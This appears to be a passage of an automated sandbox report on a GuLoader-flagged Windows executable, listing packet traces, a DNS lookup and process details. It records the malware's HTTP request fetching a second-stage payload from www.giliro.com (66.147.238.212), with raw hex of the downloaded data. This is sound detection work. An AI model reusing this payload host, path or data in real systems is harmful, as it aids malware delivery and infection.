                                                  Nov 29, 2022 11:46:42.446672916 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446676016 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446728945 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446753025 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446785927 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446844101 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446851015 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446851015 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446979046 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446979046 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.528055906 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528070927 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528081894 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528093100 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528105021 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528192997 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.528192997 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.528194904 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528209925 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528220892 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.528290987 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.528404951 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.540955067 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541054010 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541068077 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541079998 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541090965 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541099072 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541101933 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541112900 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541210890 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541210890 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541232109 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541280031 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541310072 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541316032 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541316032 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541341066 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541352987 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541378021 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541389942 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541399956 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541412115 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541426897 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541426897 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541513920 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541516066 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541523933 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541523933 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541542053 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541573048 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541587114 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541599035 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541609049 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541640043 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541640043 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541685104 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541754961 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541766882 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541779041 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541853905 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541872978 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541898012 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541903019 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541903019 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.541909933 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541920900 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541932106 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.541985035 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542015076 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542088032 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542088032 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542114973 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542128086 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542236090 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542249918 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542249918 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542292118 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542304039 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542315006 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542392015 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542403936 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542438984 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542438984 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542484999 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542536974 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542536974 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542537928 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542634964 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542644978 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542656898 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542669058 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542680979 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542684078 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542783976 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542795897 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542807102 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542809963 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542809963 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542819023 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542917967 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542917967 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542917967 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542936087 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542951107 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.542957067 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.542990923 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543055058 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543055058 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543057919 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543082952 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543112040 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543179035 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543179035 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543248892 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543277025 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543288946 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543299913 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543311119 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543320894 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543343067 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543373108 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543373108 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543392897 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543416023 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543416023 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543416977 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543464899 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543476105 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543514013 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543545961 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543559074 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543562889 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543608904 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543659925 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543715000 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543715000 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543731928 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543757915 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543783903 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543796062 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543807030 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543817043 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.543905973 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543905973 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543953896 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.543953896 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.544003010 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:53.234055996 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:53.234237909 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:31.635447025 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:31.947547913 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:32.556910992 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:33.759808064 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:36.165519953 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:40.976849079 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:48:50.584036112 CET4984480192.168.11.2066.147.238.212

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 11:46:41.745608091 CET5051153192.168.11.201.1.1.1
                                                  Nov 29, 2022 11:46:42.034929037 CET53505111.1.1.1192.168.11.20

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 29, 2022 11:46:41.745608091 CET192.168.11.201.1.1.10x5fa6Standard query (0)www.giliro.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 29, 2022 11:46:42.034929037 CET1.1.1.1192.168.11.200x5fa6No error (0)www.giliro.comgiliro.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 11:46:42.034929037 CET1.1.1.1192.168.11.200x5fa6No error (0)giliro.com66.147.238.212A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.giliro.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.11.204984466.147.238.21280C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 29, 2022 11:46:42.149955034 CET112OUTGET /wnioMvShFMvcw54.emz HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: www.giliro.com
                                                  Cache-Control: no-cache
                                                  Nov 29, 2022 11:46:42.244541883 CET112INHTTP/1.1 200 OK
                                                  Connection: Keep-Alive
                                                  Keep-Alive: timeout=5, max=100
                                                  content-type: application/x-msmetafile
                                                  last-modified: Tue, 29 Nov 2022 05:22:22 GMT
                                                  accept-ranges: bytes
                                                  content-length: 190016
                                                  date: Tue, 29 Nov 2022 10:46:42 GMT
                                                  server: LiteSpeed
                                                  Nov 29, 2022 11:46:42.255182981 CET113INData Raw: 39 0d 1c 26 76 6a 2a 16 62 d0 74 1b 48 0a 8d 67 70 9b e7 13 bc 0c e9 fb 6a 6e 4d d8 3a 17 9a 90 8a cf fe ed fd c1 9e 12 55 95 47 47 3c 02 e5 a6 f6 eb 2f a3 81 70 b2 b8 62 c1 df 68 e0 06 fa c9 50 94 1a 71 61 19 29 83 41 4f 49 39 a1 77 15 e3 ca 8a
                                                  Data Ascii: 9&vj*btHgpjnM:UGG</pbhPqa)AOI9wx? :PN2qg}>vLpQ/{L50J-SrV]%3Ouljhp/X2'okSDS+ivz1>RI|3?aE pwX=&jXDFQ}\
                                                  Nov 29, 2022 11:46:42.255256891 CET115INData Raw: 45 ab 6d 51 a9 8e a2 40 12 62 7c 07 fa 82 df 0d c7 b6 10 98 a2 7d f6 9f c3 3f b7 5b c7 a9 b1 e8 10 82 41 41 a1 ed 90 1b 3d 90 6b c2 6d ac 15 4d 8b c2 07 40 eb a9 b5 c4 97 6b 57 75 c6 de d6 f1 14 60 ba c7 ca a6 33 c2 1d d1 55 ad 35 c7 0e 10 b0 b3
                                                  Data Ascii: EmQ@b|}?[AA=kmM@kWu`3U5$NqrZ|x?Y}1_2YmM*E`]KUaO~Y|XRvYla7r4Y@yjy5(_#I Q?wC Qed{*21
                                                  Nov 29, 2022 11:46:42.255314112 CET116INData Raw: 55 d9 ea 3e 43 34 c5 2c 29 4b 4b ff ae c9 f2 fe 9f 84 c5 22 c6 b7 cf dd 98 a9 cc a4 55 7d 5c a8 f6 3f 23 35 5d c8 04 21 b6 76 4a 8c d3 33 05 a8 85 70 d6 fb 8f 71 28 ff ee 92 a5 bb cd 53 b1 9d fe af 2d 47 ea 65 63 df 08 ba 95 23 2c 80 76 17 20 46
                                                  Data Ascii: U>C4,)KK"U}\?#5]!vJ3pq(S-Gec#,v F4VTO2c7C\X8!1ctp!%cp_OcA=K9wIHq/2SZ-CuWz2v>r?| 2eLHZOZyMY%uN}Wa:IRPVes,0
                                                  Nov 29, 2022 11:46:42.255367041 CET117INData Raw: de e5 be 20 51 3f a8 b9 a0 77 43 20 51 b0 0e fe d3 9c ab ae c7 65 64 0e 7b 2a ca 0a 32 ac 31 f1 e6 35 16 5c b1 72 35 b4 74 b1 9c af 82 41 2a 82 12 6b f9 9f 60 aa 39 3a 4b a0 f4 3d 1a fa b4 21 b7 92 7e c2 f3 fc 77 9b 10 b6 e7 54 78 f1 1b 28 02 9a
                                                  Data Ascii: Q?wC Qed{*215\r5tA*k`9:K=!~wTx(H#fms'MZs?.vJMGmBEw_#)A`9w2qg}>vLpQ/{L50vJ#]:q~o=c)e|M>*
                                                  Nov 29, 2022 11:46:42.255425930 CET119INData Raw: ac fe e2 cc 75 0b 91 07 5c 5f 07 48 bc fc 3a 9d df ca 7a 2e d7 a6 99 47 4e 28 92 3f 29 51 02 2f 07 de 08 e6 9c a0 98 02 3c 65 81 16 a7 be df 04 80 04 b3 54 1e eb dc 95 04 c5 7d a2 3a 55 dd 15 85 16 1e a3 c0 2a 4d 29 3b 76 ab 50 fc ce 5a e6 9e 82
                                                  Data Ascii: u\_H:z.GN(?)Q/<eT}:U*M);vPZF+|W+kTg6"4=%JEKXLH;h}K`I7EL;qB,~`!Db)5;VEUu;<(Vb\z)l4ghCKu,m
                                                  Nov 29, 2022 11:46:42.255481958 CET120INData Raw: 07 3d 32 c3 b2 1d 9e 56 f4 aa 70 7e ec 59 2f a4 36 58 88 bb d2 9a 7f 9f fc 87 1f 36 c8 49 c5 d5 9a 61 3a 03 96 88 62 c4 5d 8c d6 c8 70 8e 12 d5 4f f7 8c e4 f6 42 4e 51 34 3b 1f fe cd d7 f7 89 24 fd c2 ad 65 1c 68 80 aa 19 e0 30 07 92 5c 1a c5 bc
                                                  Data Ascii: =2Vp~Y/6X6Ia:b]pOBNQ4;$eh0\% YzZ2F?27&gVy%-sqJp,(F~\gaPZFj L$`#~Og.S)=NF2eB{-w?|$7[R
                                                  Nov 29, 2022 11:46:42.255536079 CET121INData Raw: 25 7f 09 81 02 9e b0 f9 28 bf 11 25 dc a4 79 76 52 e6 ac 47 33 2d 88 20 5f ad 89 82 ee b3 a3 a6 b2 f5 5a 72 8d 9b 3c 25 d3 4a 5c 7d 2f f0 4f 48 7a e5 5e 74 fc 97 fc e0 95 2d b9 b7 3e f2 71 fb 38 5b d7 47 c0 9c 33 c7 1c 59 12 1a b6 0b 5f 04 4f 96
                                                  Data Ascii: %(%yvRG3- _Zr<%J\}/OHz^t->q8[G3Y_O\D_X)@{+aTQ@AD6SCiKPE.|9C^NRpr<&]! h!rOy>[a[DC;!'tTFt"-#O)<mvkER5|@[;XPIsc8
                                                  Nov 29, 2022 11:46:42.255589962 CET123INData Raw: 7b d1 8b 49 c8 c1 7d 21 1f ef e9 d2 9c ce 54 7f f4 ce d8 34 cd f6 c4 6d fe 33 10 a3 75 8a a8 88 b5 5e 8a f9 f7 08 6f 62 c0 3d d9 03 03 5c 7b 64 7e cd 7f df 26 0b c4 8f df a3 eb 3e 4e bc 92 c2 36 9d fc 33 1f 11 b2 96 45 ea 05 cd fa 0a 82 48 3b 6a
                                                  Data Ascii: {I}!T4m3u^ob=\{d~&>N63EH;ja)kq=0)!<?eVqXcAJ#Gp:vqlEQq]G'8s;H.,_/^|6WSdGnM;hmSER>1t41k
                                                  Nov 29, 2022 11:46:42.255645990 CET124INData Raw: 41 dd bc 88 76 95 ab 87 22 98 a6 55 e0 d6 7c e9 8d 85 52 6f 79 3d 99 f5 49 e9 9d 38 3d 3c 7a ec c0 75 50 d1 91 e7 aa f5 4b 6c 6a 8e 98 75 61 82 57 8b 29 9c a8 1a 30 c9 93 8a fe d0 12 bc cc e1 cf 06 66 91 ad c5 cf d7 7a e0 a2 d0 0c 93 88 0a 4f 4d
                                                  Data Ascii: Av"U|Roy=I8=<zuPKljuaW)0fzOMonwkO`LG|'Yk eZpBL @4O~Y9?9znIn;I`)W8k_D2|GhwR?
                                                  Nov 29, 2022 11:46:42.339199066 CET126INData Raw: 0d 90 f0 3e 20 29 0e 0f 56 33 42 30 58 cc 3d 7b 58 d0 53 cb 38 f1 f8 af 23 b0 8e 42 0d 17 08 17 53 d2 3b 1a 2e e4 f9 1b db 99 9f a5 f8 e9 7c f5 48 cf 2b a6 69 98 3e 55 79 af b8 61 ec ab c9 6c 4d 42 45 64 b7 cd 2e 00 0e e7 a2 22 19 70 3e 88 51 ff
                                                  Data Ascii: > )V3B0X={XS8#BS;.|H+i>UyalMBEd."p>Qay1|l?/rY>^8s&f>+jG)&2INAu\/nR/#+"OsR/!eS1>DO]`k^==[xT7Tbfx


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:1
                                                  Start time:11:45:50
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  Imagebase:0x400000
                                                  File size:477800 bytes
                                                  MD5 hash:7081C4822CF1C7572DD82822B8F27C49
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:5
                                                  Start time:11:46:24
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  Imagebase:0x400000
                                                  File size:477800 bytes
                                                  MD5 hash:7081C4822CF1C7572DD82822B8F27C49
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.39479578905.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.9%
                                                    Dynamic/Decrypted Code Coverage:6.4%
                                                    Signature Coverage:22.4%
                                                    Total number of Nodes:1009
                                                    Total number of Limit Nodes:44
                                                    execution_graph 21360 10001000 GlobalAlloc GlobalAlloc lstrcpynW GlobalFree wsprintfW 20396 401e43 20404 402c31 20396->20404 20398 401e49 20399 402c31 18 API calls 20398->20399 20400 401e55 20399->20400 20401 401e61 ShowWindow 20400->20401 20402 401e6c EnableWindow 20400->20402 20403 402adb 20401->20403 20402->20403 20405 406234 18 API calls 20404->20405 20406 402c46 20405->20406 20406->20398 20411 40344a SetErrorMode GetVersion 20412 403485 20411->20412 20413 40347f 20411->20413 20415 40657c 3 API calls 20412->20415 20414 4065ec 5 API calls 20413->20414 20414->20412 20416 40349b lstrlenA 20415->20416 20416->20412 20417 4034ab 20416->20417 20418 4065ec 5 API calls 20417->20418 20419 4034b3 20418->20419 20420 4065ec 5 API calls 20419->20420 20421 4034ba #17 OleInitialize SHGetFileInfoW 20420->20421 20499 406212 lstrcpynW 20421->20499 20423 4034f7 GetCommandLineW 20500 406212 lstrcpynW 20423->20500 20425 403509 GetModuleHandleW 20426 403521 20425->20426 20427 405bf3 CharNextW 20426->20427 20428 403530 CharNextW 20427->20428 20429 40365a GetTempPathW 20428->20429 20435 403549 20428->20435 20501 403419 20429->20501 20431 403672 20432 403676 GetWindowsDirectoryW lstrcatW 20431->20432 20433 4036cc DeleteFileW 20431->20433 20436 403419 12 API calls 20432->20436 20511 402ed5 GetTickCount GetModuleFileNameW 20433->20511 20437 405bf3 CharNextW 20435->20437 20441 403643 20435->20441 20444 403645 20435->20444 20439 403692 20436->20439 20437->20435 20438 4036e0 20442 403783 20438->20442 20446 405bf3 CharNextW 20438->20446 20494 403793 20438->20494 20439->20433 20440 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 20439->20440 20445 403419 12 API calls 20440->20445 20441->20429 20541 403a5b 20442->20541 20597 406212 lstrcpynW 20444->20597 20450 4036c4 20445->20450 20463 4036ff 20446->20463 20449 40379c OleUninitialize 20451 4038cd 20449->20451 20452 4037ad 20449->20452 20450->20433 20450->20494 20454 403951 ExitProcess 20451->20454 20455 4038d5 GetCurrentProcess OpenProcessToken 20451->20455 20601 405957 MessageBoxIndirectW 20452->20601 20456 403921 20455->20456 20457 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 20455->20457 20462 4065ec 5 API calls 20456->20462 20457->20456 20459 4037c3 20465 4058da 5 API calls 20459->20465 20460 40375d 20464 405cce 18 API calls 20460->20464 20461 4037bb ExitProcess 20466 403928 20462->20466 20463->20459 20463->20460 20467 403769 20464->20467 20468 4037c8 lstrcatW 20465->20468 20471 40393d ExitWindowsEx 20466->20471 20474 40394a 20466->20474 20467->20494 20598 406212 lstrcpynW 20467->20598 20469 4037e4 lstrcatW lstrcmpiW 20468->20469 20470 4037d9 lstrcatW 20468->20470 20473 403800 20469->20473 20469->20494 20470->20469 20471->20454 20471->20474 20476 403805 20473->20476 20477 40380c 20473->20477 20609 40140b 20474->20609 20475 403778 20599 406212 lstrcpynW 20475->20599 20480 405840 4 API calls 20476->20480 20481 4058bd 2 API calls 20477->20481 20482 40380a 20480->20482 20483 403811 SetCurrentDirectoryW 20481->20483 20482->20483 20484 403821 20483->20484 20485 40382c 20483->20485 20602 406212 lstrcpynW 20484->20602 20603 406212 lstrcpynW 20485->20603 20488 406234 18 API calls 20489 40386b DeleteFileW 20488->20489 20490 403878 CopyFileW 20489->20490 20496 40383a 20489->20496 20490->20496 20491 4038c1 20608 4060b3 38 API calls 20491->20608 20600 403969 73 API calls 20494->20600 20495 406234 18 API calls 20495->20496 20496->20488 20496->20491 20496->20495 20498 4038ac CloseHandle 20496->20498 20604 4060b3 38 API calls 20496->20604 20605 4058f2 CreateProcessW 20496->20605 20498->20496 20499->20423 20500->20425 20502 4064a6 5 API calls 20501->20502 20503 403425 20502->20503 20504 40342f 20503->20504 20505 405bc6 3 API calls 20503->20505 20504->20431 20506 403437 20505->20506 20507 4058bd 2 API calls 20506->20507 20508 40343d 20507->20508 20612 405e16 20508->20612 20616 405de7 GetFileAttributesW CreateFileW 20511->20616 20513 402f18 20540 402f25 20513->20540 20617 406212 lstrcpynW 20513->20617 20515 402f3b 20516 405c12 2 API calls 20515->20516 20517 402f41 20516->20517 20618 406212 lstrcpynW 20517->20618 20519 402f4c GetFileSize 20520 40304d 20519->20520 20538 402f63 20519->20538 20619 402e33 20520->20619 20524 4030e8 20527 402e33 33 API calls 20524->20527 20525 403090 GlobalAlloc 20526 4030a7 20525->20526 20531 405e16 2 API calls 20526->20531 20527->20540 20529 403071 20532 4033ec ReadFile 20529->20532 20530 402e33 33 API calls 20530->20538 20533 4030b8 CreateFileW 20531->20533 20534 40307c 20532->20534 20535 4030f2 20533->20535 20533->20540 20534->20525 20534->20540 20634 403402 SetFilePointer 20535->20634 20537 403100 20635 40317b 20537->20635 20538->20520 20538->20524 20538->20530 20538->20540 20650 4033ec 20538->20650 20540->20438 20542 4065ec 5 API calls 20541->20542 20543 403a6f 20542->20543 20544 403a75 GetUserDefaultUILanguage 20543->20544 20545 403a87 20543->20545 20681 406159 wsprintfW 20544->20681 20546 4060df 3 API calls 20545->20546 20548 403ab7 20546->20548 20550 403ad6 lstrcatW 20548->20550 20551 4060df 3 API calls 20548->20551 20549 403a85 20682 403d31 20549->20682 20550->20549 20551->20550 20554 405cce 18 API calls 20555 403b08 20554->20555 20556 403b9c 20555->20556 20558 4060df 3 API calls 20555->20558 20557 405cce 18 API calls 20556->20557 20559 403ba2 20557->20559 20560 403b3a 20558->20560 20561 403bb2 LoadImageW 20559->20561 20562 406234 18 API calls 20559->20562 20560->20556 20568 403b5b lstrlenW 20560->20568 20569 